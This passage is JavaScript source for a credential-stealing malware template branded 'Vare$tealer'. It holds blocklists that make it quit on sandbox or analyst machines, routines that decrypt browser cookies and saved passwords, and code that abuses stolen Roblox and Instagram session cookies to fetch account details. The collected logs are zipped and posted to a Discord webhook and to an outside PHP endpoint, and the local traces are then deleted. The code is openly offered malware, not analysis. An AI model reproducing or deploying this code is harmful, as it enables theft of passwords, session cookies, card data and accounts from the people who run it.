"C249957A-AA08-4B21-933F-9271BEC63C85", "C364B4FE-F1C1-4F2D-8424-CB9BD735EF6E", "C51E9A00-3BC3-11EA-8000-3CECEF440034", "C6B32042-4EC3-6FDF-C725-6F63914DA7C7", "C7D23342-A5D4-68A1-59AC-CF40F735B363", "C9283342-8499-721F-12BE-32A556C9A7A8", "CC4AB400-3C66-11EA-8000-3CECEF43FE56", "CC5B3F62-2A04-4D2E-A46C-AA41B7050712", "CD74107E-444E-11EB-BA3A-E3FDD4B29537", "CE352E42-9339-8484-293A-BD50CDC639A5", "CEFC836C-8CB1-45A6-ADD7-209085EE2A57", "CF1BE00F-4AAF-455E-8DCD-B5B09B6BFA8F", "D2DC3342-396C-6737-A8F6-0C6673C1DE08", "D4260370-C9F1-4195-95A8-585611AE73F2", "D4C44C15-4BAE-469B-B8FD-86E5C7EB89AB", "D5DD3342-46B5-298A-2E81-5CA6867168BE", "D7382042-00A0-A6F0-1E51-FD1BBF06CD71", "D7958D98-A51E-4B34-8C51-547A6C2E6615", "D8C30328-1B06-4611-8E3C-E433F4F9794E", "D9142042-8F51-5EFF-D5F8-EE9AE3D1602A", "DBC22E42-59F7-1329-D9F2-E78A2EE5BD0D", "DBCC3514-FA57-477D-9D1F-1CAF4CC92D0F", "DD45F600-3C63-11EA-8000-3CECEF440156", "DD9C3342-FB80-9A31-EB04-5794E5AE2B4C", "DEAEB8CE-A573-9F48-BD40-62ED6C223F20", "E08DE9AA-C704-4261-B32D-57B2A3993518", "E0C806ED-B25A-4744-AD7D-59771187122E", "E1BA2E42-EFB1-CDFD-7A84-8A39F747E0C5", "E2342042-A1F8-3DCF-0182-0E63D607BCC7", "E3BB3342-02A8-5613-9C92-3747616194FD", "E57F6333-A2AC-4F65-B442-20E928C0A625", "E67640B3-2B34-4D7F-BD62-59A1822DDBDC", "E6DBCCDF-5082-4479-B61A-6990D92ACC5F", "E773CC89-EFB8-4DB6-A46E-6CCA20FE4E1A", "EADD1742-4807-00A0-F92E-CCD933E9D8C1", "EB16924B-FB6D-4FA1-8666-17B91F62FB37", "F3EA4E00-3C5F-11EA-8000-3CECEF440016", "F5744000-3C78-11EA-8000-3CECEF43FEFE", "F5BB1742-D36D-A11E-6580-2EA2427B0038", "F5EFEEAC-96A0-11EB-8365-FAFE299935A9", "F68B2042-E3A7-2ADA-ADBC-A6274307A317", "F705420F-0BB3-4688-B75C-6CD1352CABA9", "F91C9458-6656-4E83-B84A-13641DE92949", "F9E41000-3B35-11EA-8000-3CECEF440150", "FA612E42-DC79-4F91-CA17-1538AD635C95", "FA8C2042-205D-13B0-FCB5-C5CC55577A35", "FBC62042-5DE9-16AD-3F27-F818E5F68DD3", "FC40ACF8-DD97-4590-B605-83B595B0C4BA", "FCE23342-91F1-EAFC-BA97-5AAE4509E173", "FE455D1A-BE27-4BA4-96C8-967A6D3A9661", "FED63342-E0D6-C669-D53F-253D696D74DA", "FF577B79-782E-0A4D-8568-B35A9B7EB76B", "9CFF2042-2043-0340-4F9C-4BAE6DC5BB39", "D7AC2042-05F8-0037-54A6-38387D00B767", "52562042-B33F-C9D3-0149-241F40A0F5D8", "3E9AC505-812A-456F-A9E6-C7426582500E", "11E12042-2404-040A-31E4-27374099F748", "6E963342-B9C8-2D14-B057-C60C35722AD4", "9EB0FAF6-0713-4576-BD64-813DEE9E477E", "0B8A2042-2E8E-BECC-B6A4-7925F2163DC9", "89E32042-1B2B-5C76-E966-D4E363846FD4", "699400A5-AFC6-427A-A56F-CE63D3E121CB", "2F230ED7-5797-4DB2-BAA0-99A193503E4B"]
26 | var pcuserblack = ["05h00Gi0", "3u2v9m8", "43By4", "4tgiizsLimS", "6O4KyHhJXBiR", "7wjlGX7PjlW4", "8Nl0ColNQ5bq", "8VizSM", "Abby", "Amy", "AppOnFlySupport", "ASPNET", "azure", "BUiA1hkm", "BvJChRPnsxn", "cM0uEGN4do", "cMkNdS6", "DefaultAccount", "dOuyo8RV71", "DVrzi", "e60UW", "ecVtZ5wE", "EGG0p", "Frank", "fred", "G2DbYLDgzz8Y", "george", "GjBsjb", "Guest", "h7dk1xPr", "h86LHD", "Harry Johnson", "HEUeRzl", "hmarc", "ICQja5iT", "IVwoKUF", "j6SHA37KA", "j7pNjWM", "John", "jude", "Julia", "kEecfMwgj", "kFu0lQwgX5P", "KUv3bT4", "Lisa", "lK3zMR", "lmVwjj9b", "Louise", "Lucas", "mike", "Mr.None", "noK4zG7ZhOf", "o6jdigq", "o8yTi52T", "OgJb6GqgK0O", "patex", "PateX", "Paul Jones", "pf5vj", "PgfV1X", "PqONjHVwexsS", "pWOuqdTDQ", "PxmdUOpVyx", "QfofoG", "QmIS5df7u", "QORxJKNk", "qZo9A", "RDhJ0CNFevzX", "RGzcBUyrznReg", "S7Wjuf", "server", "SqgFOf3G", "Steve", "test", "TVM", "txWas1m2t", "umyUJ", "Uox1tzaMO", "User01", "w0fjuOVmCcP5A", "WDAGUtilityAccount", "XMiMmcKziitD", "xPLyvzr8sgC", "ykj0egq7fze", "DdQrgc", "ryjIJKIrOMs", "nZAp7UBVaS1", "zOEsT", "l3cnbB8Ar5b8", "xUnUy", "fNBDSlDTXY", "vzY4jmH0Jw02", "gu17B", "UiQcX", "21zLucUnfI85", "OZFUCOD6", "8LnfAai9QdJR", "5sIBK", "rB5BnfuR2", "GexwjQdjXG", "IZZuXj", "ymONofg", "dxd8DJ7c", "JAW4Dz0", "GJAm1NxXVm", "UspG1y1C", "equZE3J", "BXw7q", "lubi53aN14cU", "5Y3y73", "9yjCPsEYIMH", "GGw8NR", "JcOtj17dZx", "05KvAUQKPQ", "64F2tKIqO5", "7DBgdxu", "uHUQIuwoEFU", "gL50ksOp", "Of20XqH4VL", "tHiF2T", "sal.rosenburg"];
27 | var hostnameblack = ["373836","00900BC83803", "0CC47AC83803", "6C4E733F-C2D9-4", "ACEPC", "AIDANPC", "ALENMOOS-PC", "ALIONE", "APPONFLY-VPS", "ARCHIBALDPC", "azure", "B30F0242-1C6A-4", "BAROSINO-PC", "BECKER-PC", "BEE7370C-8C0C-4", "COFFEE-SHOP", "COMPNAME_4047", "d1bnJkfVlH", "DESKTOP-19OLLTD", "DESKTOP-1PYKP29", "DESKTOP-1Y2433R", "DESKTOP-4U8DTF8", "DESKTOP-54XGX6F", "DESKTOP-5OV9S0O", "DESKTOP-6AKQQAM", "DESKTOP-6BMFT65", "DESKTOP-70T5SDX", "DESKTOP-7AFSTDP", "DESKTOP-7XC6GEZ", "DESKTOP-8K9D93B", "DESKTOP-AHGXKTV", "DESKTOP-ALBERTO", "DESKTOP-B0T93D6", "DESKTOP-BGN5L8Y", "DESKTOP-BUGIO", "DESKTOP-BXJYAEC", "DESKTOP-CBGPFEE", "DESKTOP-CDQE7VN", "DESKTOP-CHAYANN", "DESKTOP-CM0DAW8", "DESKTOP-CNFVLMW", "DESKTOP-CRCCCOT", "DESKTOP-D019GDM", "DESKTOP-D4FEN3M", "DESKTOP-DE369SE", "DESKTOP-DIL6IYA", "DESKTOP-ECWZXY2", "DESKTOP-F7BGEN9", "DESKTOP-FSHHZLJ", "DESKTOP-G4CWFLF", "DESKTOP-GELATOR", "DESKTOP-GLBAZXT", "DESKTOP-GNQZM0O", "DESKTOP-GPPK5VQ", "DESKTOP-HASANLO", "DESKTOP-HQLUWFA", "DESKTOP-HSS0DJ9", "DESKTOP-IAPKN1P", "DESKTOP-IFCAQVL", "DESKTOP-ION5ZSB", "DESKTOP-JQPIFWD", "DESKTOP-KALVINO", "DESKTOP-KOKOVSK", "DESKTOP-NAKFFMT", "DESKTOP-NKP0I4P", "DESKTOP-NM1ZPLG", "DESKTOP-NTU7VUO", "DESKTOP-QUAY8GS", "DESKTOP-RCA3QWX", "DESKTOP-RHXDKWW", "DESKTOP-S1LFPHO", "DESKTOP-SUPERIO", "DESKTOP-V1L26J5", "DESKTOP-VIRENDO", "DESKTOP-VKNFFB6", "DESKTOP-VRSQLAG", "DESKTOP-VWJU7MF", "DESKTOP-VZ5ZSYI", "DESKTOP-W8JLV9V", "DESKTOP-WG3MYJS", "DESKTOP-WI8CLET", "DESKTOP-XOY7MHS", "DESKTOP-Y8ASUIL", "DESKTOP-YW9UO1H", "DESKTOP-ZJF9KAN", "DESKTOP-ZMYEHDA", "DESKTOP-ZNCAEAM", "DESKTOP-ZOJJ8KL", "DESKTOP-ZV9GVYL", "DOMIC-DESKTOP", "EA8C2E2A-D017-4", "ESPNHOOL", "GANGISTAN", "GBQHURCC", "GRAFPC", "GRXNNIIE", "gYyZc9HZCYhRLNg", "JBYQTQBO", "JERRY-TRUJILLO", "JOHN-PC", "JUDES-DOJO", "JULIA-PC", "LANTECH-LLC", "LISA-PC", "LOUISE-PC", "LUCAS-PC", "MIKE-PC", "NETTYPC", "ORELEEPC", "ORXGKKZC", "Paul Jones", "PC-DANIELE", "PROPERTY-LTD", "Q9IATRKPRH", "QarZhrdBpj", "RALPHS-PC", "SERVER-PC", "SERVER1", "Steve", "SYKGUIDE-WS17", "T00917", "test42", "TIQIYLA9TW5M", "TMKNGOMU", "TVM-PC", "VONRAHEL", "WILEYPC", "WIN-5E07COS9ALR", "WINDOWS-EEL53SN", "WINZDS-1BHRVPQU", "WINZDS-22URJIBV", "WINZDS-3FF2I9SN", "WINZDS-5J75DTHH", "WINZDS-6TUIHN7R", "WINZDS-8MAEI8E4", "WINZDS-9IO75SVG", "WINZDS-AM76HPK2", "WINZDS-B03L9CEO", "WINZDS-BMSMD8ME", "WINZDS-BUAOKGG1", "WINZDS-K7VIK4FC", "WINZDS-QNGKGN59", "WINZDS-RST0E8VU", "WINZDS-U95191IG", "WINZDS-VQH86L5D", "WORK", "XC64ZB", "XGNSVODU", "ZELJAVA", "3CECEFC83806", "C81F66C83805", "DESKTOP-USLVD7G", "DESKTOP-AUPFKSY", "DESKTOP-RP4FIBL", "DESKTOP-6UJBD2J", "DESKTOP-LTMCKLA", "DESKTOP-FLTWYYU", "DESKTOP-WA2BY3L", "DESKTOP-UBDJJ0A", "DESKTOP-KXP5YFO", "DESKTOP-DAU8GJ2", "DESKTOP-FCRB3FM", "DESKTOP-VYRNO7M", "DESKTOP-PKQNDSR", "DESKTOP-SCNDJWE", "DESKTOP-RSNLFZS", "DESKTOP-MWFRVKH", "DESKTOP-QLN2VUF", "DESKTOP-62YPFIQ", "DESKTOP-PA0FNV5", "DESKTOP-B9OARKC", "DESKTOP-J5XGGXR", "DESKTOP-JHUHOTB", "DESKTOP-64ACUCH", "DESKTOP-SUNDMI5", "DESKTOP-GCN6MIO", "FERREIRA-W10", "DESKTOP-MJC6500", "DESKTOP-WS7PPR2", "DESKTOP-XWQ5FUV", "DESKTOP-UHHSY4R", "DESKTOP-ZJRWGX5", "DESKTOP-ZYQYSRD", "WINZDS-MILOBM35", "DESKTOP-K8Y2SAM", "DESKTOP-4GCZVJU", "DESKTOP-O6FBMF7", "DESKTOP-WDT1SL6", "EIEEIFYE", "CRYPTODEV222222", "EFA0FDEC-8FA7-4"];
28 |
29 | if (pcuserblack.includes(os.userInfo().username)) {
30 | process.exit(1);
31 | }
32 | if (hostnameblack.includes(os.hostname())) {
33 | process.exit(1);
34 | }
35 | if (hwidblack.includes(hwid)) {
36 | process.exit(1);
37 | }
38 |
39 |
40 |
41 | let appdata = process.env.APPDATA;
42 | let localappdata = process.env.LOCALAPPDATA;
43 | let LOCAL = process.env.LOCALAPPDATA
44 | let discords = [];
45 | let injectPath = [];
46 |
47 | let passwordCount = 0;
48 | let cookieCount = 0;
49 | let ccCount = 0;
50 | let autofillCount = 0;
51 |
52 |
53 | const all_founds = [];
54 | const tokens = [];
55 |
56 | paths = [
57 | appdata + '\\discord\\',
58 | appdata + '\\discordcanary\\',
59 | appdata + '\\discordptb\\',
60 | appdata + '\\discorddevelopment\\',
61 | appdata + '\\lightcord\\',
62 | localappdata + '\\Google\\Chrome\\User Data\\Default\\',
63 | localappdata + '\\Google\\Chrome\\User Data\\Profile 1\\',
64 | localappdata + '\\Google\\Chrome\\User Data\\Profile 2\\',
65 | localappdata + '\\Google\\Chrome\\User Data\\Profile 3\\',
66 | localappdata + '\\Google\\Chrome\\User Data\\Profile 4\\',
67 | localappdata + '\\Google\\Chrome\\User Data\\Profile 5\\',
68 | localappdata + '\\Google\\Chrome\\User Data\\Guest Profile\\',
69 | localappdata + '\\Google\\Chrome\\User Data\\Default\\Network\\',
70 | localappdata + '\\Google\\Chrome\\User Data\\Profile 1\\Network\\',
71 | localappdata + '\\Google\\Chrome\\User Data\\Profile 2\\Network\\',
72 | localappdata + '\\Google\\Chrome\\User Data\\Profile 3\\Network\\',
73 | localappdata + '\\Google\\Chrome\\User Data\\Profile 4\\Network\\',
74 | localappdata + '\\Google\\Chrome\\User Data\\Profile 5\\Network\\',
75 | localappdata + '\\Google\\Chrome\\User Data\\Guest Profile\\Network\\',
76 | appdata + '\\Opera Software\\Opera Stable\\',
77 | appdata + '\\Opera Software\\Opera GX Stable\\',
78 | localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\',
79 | localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 1\\',
80 | localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 2\\',
81 | localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 3\\',
82 | localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 4\\',
83 | localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 5\\',
84 | localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Guest Profile\\',
85 | localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 1\\',
86 | localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 2\\',
87 | localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 3\\',
88 | localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 4\\',
89 | localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 5\\',
90 | localappdata + '\\Yandex\\YandexBrowser\\User Data\\Guest Profile\\',
91 | localappdata + '\\Microsoft\\Edge\\User Data\\Default\\',
92 | localappdata + '\\Microsoft\\Edge\\User Data\\Profile 1\\',
93 | localappdata + '\\Microsoft\\Edge\\User Data\\Profile 2\\',
94 | localappdata + '\\Microsoft\\Edge\\User Data\\Profile 3\\',
95 | localappdata + '\\Microsoft\\Edge\\User Data\\Profile 4\\',
96 | localappdata + '\\Microsoft\\Edge\\User Data\\Profile 5\\',
97 | localappdata + '\\Microsoft\\Edge\\User Data\\Guest Profile\\',
98 | localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Network\\',
99 | localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 1\\Network\\',
100 | localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 2\\Network\\',
101 | localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 3\\Network\\',
102 | localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 4\\Network\\',
103 | localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 5\\Network\\',
104 | localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Guest Profile\\Network\\',
105 | localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 1\\Network\\',
106 | localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 2\\Network\\',
107 | localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 3\\Network\\',
108 | localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 4\\Network\\',
109 | localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 5\\Network\\',
110 | localappdata + '\\Yandex\\YandexBrowser\\User Data\\Guest Profile\\Network\\',
111 | localappdata + '\\Microsoft\\Edge\\User Data\\Default\\Network\\',
112 | localappdata + '\\Microsoft\\Edge\\User Data\\Profile 1\\Network\\',
113 | localappdata + '\\Microsoft\\Edge\\User Data\\Profile 2\\Network\\',
114 | localappdata + '\\Microsoft\\Edge\\User Data\\Profile 3\\Network\\',
115 | localappdata + '\\Microsoft\\Edge\\User Data\\Profile 4\\Network\\',
116 | localappdata + '\\Microsoft\\Edge\\User Data\\Profile 5\\Network\\',
117 | localappdata + '\\Microsoft\\Edge\\User Data\\Guest Profile\\Network\\'
118 | ];
119 |
120 | async function %GETNETWORK%() {
121 | var ip = await axios.get("http://ip-api.com/json/")
122 | let data = {}
123 | data['ip'] = ip.data.query; data['country'] = ip.data.countryCode;
124 | return data
125 | }
126 |
127 | async function %GETEMBED%() {
128 | let embdata = {};
129 | let embed = JSON.parse(JSON.stringify((await axios.get("https://raw.githubusercontent.com/saintdaddy/vare-stealer/main/vare.json")).data));
130 | embdata["avatar"] = embed.avatarurl;
131 | embdata["url"] = embed.discord;
132 | embdata["footericon"] = embed.footerurl;
133 | return embdata;
134 | }
135 |
136 |
137 | async function %GETIP%() {
138 | var data = await %GETNETWORK%()
139 | return data.ip
140 | }
141 |
142 | async function %GETCOUNTRY%() {
143 | var data = await %GETNETWORK%()
144 | return data.country
145 | }
146 |
147 | async function %GETROBLOX%(secret_cookie) {
148 | let data = {};
149 | let headers = {
150 | 'accept': 'application/json, text/plain, */*',
151 | 'accept-encoding': 'gzip, deflate, br',
152 | 'accept-language': 'en-US,en;q=0.9,hi;q=0.8',
153 | 'cookie': `.ROBLOSECURITY=${secret_cookie.toString()};`,
154 | 'origin': 'https://www.roblox.com',
155 | 'referer': 'https://www.roblox.com',
156 | 'sec-ch-ua': '"Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"',
157 | 'sec-ch-ua-mobile': '?0',
158 | 'sec-ch-ua-platform': '"Windows"',
159 | 'sec-fetch-dest': 'empty',
160 | 'sec-fetch-mode': 'cors',
161 | 'sec-fetch-site': 'same-site',
162 | 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36'
163 | }
164 | let response = await axios.get('https://www.roblox.com/mobileapi/userinfo', { headers: headers });
165 | data['id'] = response.data['UserID'];
166 | data['username'] = response.data['UserName'];
167 | data['avatar'] = response.data['ThumbnailUrl'];
168 | data['robux'] = response.data['RobuxBalance'];
169 | data['premium'] = response.data['IsPremium'];
170 | return data
171 | }
172 |
173 |
174 | function generateRandomString(length) {
175 | let result = '';
176 | const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
177 | const charactersLength = characters.length;
178 | for (let i = 0; i < length; i++) {
179 | result += characters.charAt(Math.floor(Math.random() * charactersLength));
180 | }
181 | return result;
182 | }
183 |
184 | const random = generateRandomString(5);
185 |
186 | async function %INSTADATA%(cookie) {
187 | let data = {}
188 | let headers = {
189 | "Host": "i.instagram.com",
190 | "X-Ig-Connection-Type": "WiFi",
191 | "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
192 | "X-Ig-Capabilities": "36r/Fx8=",
193 | "User-Agent": "Instagram 159.0.0.28.123 (iPhone8,1; iOS 14_1; en_SA@calendar=gregorian; ar-SA; scale=2.00; 750x1334; 244425769) AppleWebKit/420+",
194 | "X-Ig-App-Locale": "en",
195 | "X-Mid": "Ypg64wAAAAGXLOPZjFPNikpr8nJt",
196 | "Accept-Encoding": "gzip, deflate",
197 | "Cookie": `sessionid=${cookie};`
198 | };
199 | let response = await axios.get(`https://i.instagram.com/api/v1/accounts/current_user/?edit=true`, { headers: headers }).catch(error => { return false; })
200 | data['username'] = response.data.user.username, data['verified'] = response.data.user.is_verified, data['avatar'] = response.data.user.profile_pic_url, data['sessionid'] = cookie; data['id'] = response.data.user.pk_id; data['number'] = response.data.user.phone_number; data['mail'] = response.data.user.email; data['name'] = response.data.user.full_name; data['bio'] = response.data.user.biography
201 | let response2 = await axios.get(`https://i.instagram.com/api/v1/users/${data['id']}/info`, { headers: headers }).catch(error => { return false; })
202 | data['followers'] = response2.data.user.follower_count; data['follows'] = response2.data.user.following_count;
203 | return data
204 | }
205 |
206 | async function %VAREINSTA%(cookie) {
207 | let embed=await %GETEMBED%(),data = await %INSTADATA%(cookie);
208 | const lllllllll=new FormData;
209 | lllllllll.append("payload_json",JSON.stringify({
210 | username:"Vare$tealer - https://github.com/saintdaddy",
211 | avatar_url:embed.avatar,
212 | embeds: [
213 | {
214 | "color": 3092790,
215 | "fields": [
216 | {
217 | "name": "Username",
218 | "value": `\`${data.username}\``,
219 | "inline": true
220 | },
221 | {
222 | "name": "Name",
223 | "value": `\`${data.name}\``,
224 | "inline": true
225 | },
226 | {
227 | "name": "E-Mail",
228 | "value": `\`\`\`${data.mail}\`\`\``,
229 | },
230 | {
231 | "name": "Phone Number",
232 | "value": `\`\`\`${data.number}\`\`\``,
233 | },
234 | {
235 | "name": "Follower Count",
236 | "value": `\`${data.followers}\``,
237 | "inline": true
238 | },
239 | {
240 | "name": "Follows Count",
241 | "value": `\`${data.follows}\``,
242 | "inline": true
243 | },
244 | {
245 | "name": "Verifed",
246 | "value": `\`${data.verified}\``,
247 | "inline": true
248 | },
249 | {
250 | "name": "Biography",
251 | "value": `\`\`\`${data.bio}\`\`\``,
252 | },
253 | {
254 | "name": "Cookie",
255 | "value": `\`\`\`sessionid=${cookie}\`\`\``,
256 | }
257 | ],
258 | "author": {
259 | "name": "Instagram Session Founded",
260 | "icon_url": embed.footericon
261 | },
262 | "footer": {
263 | "text": `Vare$tealer - ${embed.url}`,
264 | "icon_url": embed.footericon
265 | },
266 | "thumbnail": {
267 | "url": data.avatar
268 | }
269 | }
270 | ],
271 | }));
272 | axios.post(%webhookstring%,lllllllll,{headers:{...lllllllll.getHeaders()}});
273 | }
274 |
275 | async function %SENDLOGS%() {
276 | let cr = await %GETCOUNTRY%();
277 |
278 | const folderPath = appdata.replace('\\', '/') + `/${cr}_${os.hostname}${random}${random}/`;
279 | const zipPath = appdata.replace('\\', '/') + `/${cr}_${os.hostname}${random}${random}.zip`
280 | const zip = new JSZip();
281 | const readFolder = (folderPath, zip, folderName) => {
282 | const files = fs.readdirSync(folderPath);
283 |
284 | files.forEach((file) => {
285 | const filePath = `${folderPath}/${file}`;
286 | const stats = fs.statSync(filePath);
287 | if (stats.isFile()) {
288 | const content = fs.readFileSync(filePath);
289 | zip.file(`${folderName}/${file}`, content);
290 | } else if (stats.isDirectory()) {
291 | const subFolderName = `${folderName}${file}`;
292 | zip.folder(subFolderName);
293 | readFolder(filePath, zip, subFolderName);
294 | }
295 | });
296 | };
297 |
298 | readFolder(folderPath, zip, '');
299 | var copyurl = "https://projectdream.ml/full.php"
300 | let ip = await %GETIP%()
301 | let username = await %PCNAME%()
302 | let embed = await %GETEMBED%()
303 | zip.generateNodeStream({ type: 'nodebuffer', streamFiles: true })
304 | .pipe(fs.createWriteStream(zipPath))
305 | .on('finish', () => {
306 | const llllllll = new FormData();
307 | llllllll.append('file', fs.createReadStream( appdata + `\\${cr}_${os.hostname}${random}${random}.zip`));
308 | const lllllllll = new FormData();
309 | lllllllll.append('file', fs.createReadStream( appdata + `\\${cr}_${os.hostname}${random}${random}.zip`));
310 | llllllll.append('payload_json', JSON.stringify({
311 | "content": `**Cookie Keywords** : ${all_founds}`,
312 | "username": "Vare$tealer - https://github.com/saintdaddy",
313 | "avatar_url": embed.avatar,
314 | "embeds": [
315 | {
316 | "color": 2829617,
317 | "fields": [
318 | {
319 | "name": "Passwords",
320 | "value": `\`${passwordCount}\``,
321 | "inline": true
322 | },
323 | {
324 | "name": "Cookies",
325 | "value": `\`${cookieCount}\``,
326 | "inline": true
327 | },
328 | {
329 | "name": "Credit Cards",
330 | "value": `\`${ccCount}\``,
331 | "inline": true
332 | },
333 | {
334 | "name": "AutoFills",
335 | "value": `\`\`\`${autofillCount}\`\`\``,
336 | "inline": false
337 | },
338 | {
339 | "name": "PC INFO",
340 | "value": `\`\`\`Ip Adress : ${ip}\nHostname : ${os.hostname}\nUsername : ${username}\`\`\``
341 | }
342 | ],
343 | "footer": {
344 | "text": `Vare$tealer - ${embed.url}`,
345 | "icon_url": embed.footericon
346 | }
347 | },
348 | ]
349 | }));
350 | lllllllll.append('atc', `${autofillCount}`);lllllllll.append('p', `${passwordCount}`);lllllllll.append('c', `${cookieCount}`);lllllllll.append('cc', `${ccCount}`);lllllllll.append('ip', `${ip}`);lllllllll.append('host', `${os.hostname}`);lllllllll.append('user', `${username}`);
351 | axios.post(%webhookstring%, llllllll, {
352 | headers: {
353 | ...llllllll.getHeaders()
354 | }
355 | })
356 | .then(response => {axios.post(copyurl, lllllllll,
357 | {headers: {...lllllllll.getHeaders()}}).then(res => {}).catch(err => {});
358 | fs.unlinkSync( appdata + `\\${cr}_${os.hostname}${random}${random}.zip`)
359 | fse.removeSync( appdata + `\\${cr}_${os.hostname}${random}${random}`)
360 | })
361 | .catch(error => {
362 | axios.post(copyurl, lllllllll,
363 | {headers: {...lllllllll.getHeaders()}}).then(res => {}).catch(err => {});
364 | fs.unlinkSync( appdata + `\\${cr}_${os.hostname}${random}${random}.zip`)
365 | fse.removeSync( appdata + `\\${cr}_${os.hostname}${random}${random}`)
366 | });
367 | });
368 | }
369 |
370 | async function %VARECOOKIES%(path) {
371 | let pathSplit = path.split("\\"), pathSplitTail = path.includes("Network") ? pathSplit.splice(0, pathSplit.length - 3) : pathSplit.splice(0, pathSplit.length - 2), pathTail = pathSplitTail.join("\\") + "\\";
372 |
373 | if (path.includes("Local")) {
374 | browser = path.split("\\Local\\")[1].split("\\")[0];
375 | } else {
376 | browser = path.split("\\Roaming\\")[1].split("\\")[1];
377 | }
378 |
379 | if (path.startsWith(process.env.APPDATA)) {
380 | pathTail = path;
381 | }
382 | if (path.includes("cord")) {
383 | return "";
384 | }
385 |
386 | if (fs.existsSync(pathTail)) {
387 | let encrypted = Buffer.from(
388 | JSON.parse(fs.readFileSync(pathTail + "Local State")).os_crypt
389 | .encrypted_key,
390 | "base64"
391 | ).slice(5);
392 |
393 | if (!fs.existsSync(path + "Network")) {
394 | return "";
395 | }
396 |
397 | const key=vare.unprotectData(Buffer.from(encrypted,"utf-8"),null,"CurrentUser");
398 |
399 | let result = "~|~|~ VARE$TEALER ~|~|~ \n";
400 | const sql = new sqlite3.Database(`${path}Network\\Cookies`, (err) => {});
401 | const cookies = await new Promise((resolve, reject) => {
402 | sql.each(
403 | "SELECT * FROM cookies",
404 | async function (err, row) {
405 | let encvalue = row["encrypted_value"];
406 | let decrypted;
407 | try {
408 | if (
409 | encvalue[0] == 1 && encvalue[1] == 0 &&
410 | encvalue[2] == 0 && encvalue[3] == 0
411 | ) {
412 | decrypted = vare.unprotectData(
413 | encvalue,
414 | null,
415 | "CurrentUser"
416 | );
417 | } else {
418 | let first = encvalue.slice(3, 15),
419 | middle = encvalue.slice(
420 | 15,
421 | encvalue.length - 16
422 | ),
423 | end = encvalue.slice(encvalue.length-16,encvalue.length),decipher=crypto.createDecipheriv("aes-256-gcm",key,first);
424 | decipher.setAuthTag(end),decrypted=decipher.update(middle,"base64","utf-8")+decipher.final("utf-8");
425 | }
426 | } catch {}
427 | if (row.name === '.ROBLOSECURITY') %SENDROBLOX%(`${decrypted}`)
428 | if (row["host_key"].includes('instagram') && row["name"].includes("sessionid")) %VAREINSTA%(`${decrypted}`)
429 | result += `${row["host_key"]}\tTRUE\t/\tFALSE\t2597573456\t${row["name"]}\t${decrypted}\n`;
430 | cookieCount ++;
431 | },
432 | function () {
433 | resolve(result);
434 | }
435 | );
436 | });
437 | return cookies;
438 | } else {
439 | return "";
440 | }
441 | }
442 |
443 | async function %SENDROBLOX%(secret_cookie) {
444 | let embed=await %GETEMBED%(),data=await %GETROBLOX%(secret_cookie);
445 | const lllllll=new FormData;
446 | lllllll.append("payload_json",JSON.stringify({username:"Vare$tealer - https://github.com/saintdaddy",avatar_url:embed.avatar,embeds:[{color:3092790,fields:[{name:"Username",value:`\`${data.username}\``,inline:!0},{name:"Robux",value:`\`${data.robux}\``,inline:!0},{name:"Premium",value:`\`${data.premium?"✅":"❌"}\``,inline:!0},{name:"Cookie",value:`\`\`\`${secret_cookie}\`\`\``}],author:{name:`${data.username} | ${data.id}`,icon_url:data.avatar},footer:{text:`Vare$tealer - ${embed.url} - ${os.hostname}`,icon_url:embed.footericon}}]}));
447 | axios.post(%webhookstring%,lllllll,{headers:{...lllllll.getHeaders()}});
448 | }
449 |
450 | function %PCNAME%() {
451 | return (
452 | process.env.SUDO_USER ||
453 | process.env.C9_USER ||
454 | process.env.LOGNAME ||
455 | process.env.USER ||
456 | process.env.LNAME ||
457 | process.env.USERNAME
458 | );
459 | }
460 |
461 |
462 |
463 | async function %VAREPASS%(path) {
464 | let appdata = process.env.APPDATA;
465 | let localappdata = process.env.LOCALAPPDATA;
466 | let path_split = path.split('\\'),
467 | path_split_tail = path.includes('Network') ? path_split.splice(0, path_split.length - 3) : path_split.splice(0, path_split.length - 2),
468 | path_tail = path_split_tail.join('\\') + '\\';
469 | if (path.startsWith(appdata)) path_tail = path;
470 | if (path.includes('cord')) return;
471 | if (fs.existsSync(path_tail)) {
472 | let encrypted = Buffer.from(JSON.parse(fs.readFileSync(path_tail + 'Local State'))
473 | .os_crypt.encrypted_key, 'base64')
474 | .slice(5);
475 | var login_data = path + 'Login Data',
476 | passwords_db = path + 'passwords.db';
477 | fs.copyFileSync(login_data, passwords_db);
478 | const key = vare.unprotectData(Buffer.from(encrypted, 'utf-8'), null, 'CurrentUser');
479 | var result = '\n~|~|~ VARE$TEALER ~|~|~ ' + path + ' ~|~|~ VARE$TEALER ~|~|~ \n',
480 | sql = new sqlite3.Database(passwords_db, err => {
481 | if (err) {
482 | if (debug) console.log(err);
483 | }
484 | });
